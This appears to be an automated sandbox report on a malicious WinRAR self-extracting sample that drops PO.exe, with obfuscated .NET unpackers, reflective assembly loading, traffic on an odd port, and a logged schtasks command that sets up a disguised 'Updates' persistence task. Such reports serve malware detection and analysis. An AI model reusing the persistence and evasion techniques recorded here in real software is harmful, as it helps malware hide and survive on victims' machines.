Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: w4XFffGDz1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: w4XFffGDz1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe

Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: PO.exe.0.dr, MainForm.cs	.Net Code: InitializeComponent
Source: AJzHYZtQIb.exe.7.dr, MainForm.cs	.Net Code: InitializeComponent
Source: 7.2.PO.exe.29ee27c.0.raw.unpack, LoginForm.cs	.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.7770000.7.raw.unpack, LoginForm.cs	.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6362281

Jump to behavior

Source: w4XFffGDz1.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018C403 push ecx; ret	0_2_0018C416
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D4B0 push ecx; ret	0_2_0018D4C3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697E5CF push es; ret	14_2_0697E5E0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA9695 push FFFFFF8Bh; iretd	16_2_07AA9697
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D48D0B push esp; retf	16_2_08D48D0D

Source: PO.exe.0.dr	Static PE information: section name: .text entropy: 7.616094055788291
Source: AJzHYZtQIb.exe.7.dr	Static PE information: section name: .text entropy: 7.616094055788291

Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, vDrWgAuv05qGryjBLgI.cs	High entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, p7yy0t7M82Hmx79AfL.cs	High entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, q72tq2ximplPDGFyoN.cs	High entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, ocaowhuM8mELpeCg1ig.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, S4G9XnevepCQioK3is.cs	High entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, IcmTCBLlejKLSTLxHH.cs	High entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, lBVadcz5bviu8jxc7G.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, rmFfbhZkpQQsFEbfol.cs	High entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, zFBqeEjRFBLSRfwf0A.cs	High entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, eQO0SCdvWMrQTMtdfV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, qQX0XtkHmUSEBYI1Ue.cs	High entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Bvw1RBceaN523NPJik.cs	High entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, oVpml5PMcJ46Alhh5x.cs	High entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, j7TAQmhL1SaPlhQ8HW.cs	High entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	High entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.cs	High entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, LJTjbSmSH66JQvrsi3.cs	High entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, xcI1enoJkXBKDmiAdr.cs	High entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, X5ql3I12sxhVIpAQQo.cs	High entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Psiccf4bVvVDkx6mSI.cs	High entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.cs	High entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, pLG4Ea5tVQMslBLeve.cs	High entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, vDrWgAuv05qGryjBLgI.cs	High entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, p7yy0t7M82Hmx79AfL.cs	High entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, q72tq2ximplPDGFyoN.cs	High entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, ocaowhuM8mELpeCg1ig.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, S4G9XnevepCQioK3is.cs	High entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, IcmTCBLlejKLSTLxHH.cs	High entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, lBVadcz5bviu8jxc7G.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, rmFfbhZkpQQsFEbfol.cs	High entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, zFBqeEjRFBLSRfwf0A.cs	High entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, eQO0SCdvWMrQTMtdfV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, qQX0XtkHmUSEBYI1Ue.cs	High entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Bvw1RBceaN523NPJik.cs	High entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, oVpml5PMcJ46Alhh5x.cs	High entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, j7TAQmhL1SaPlhQ8HW.cs	High entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	High entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.cs	High entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, LJTjbSmSH66JQvrsi3.cs	High entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, xcI1enoJkXBKDmiAdr.cs	High entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, X5ql3I12sxhVIpAQQo.cs	High entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, Psiccf4bVvVDkx6mSI.cs	High entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.cs	High entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
Source: 7.2.PO.exe.79d0000.8.raw.unpack, pLG4Ea5tVQMslBLeve.cs	High entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe			Jump to dropped file
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
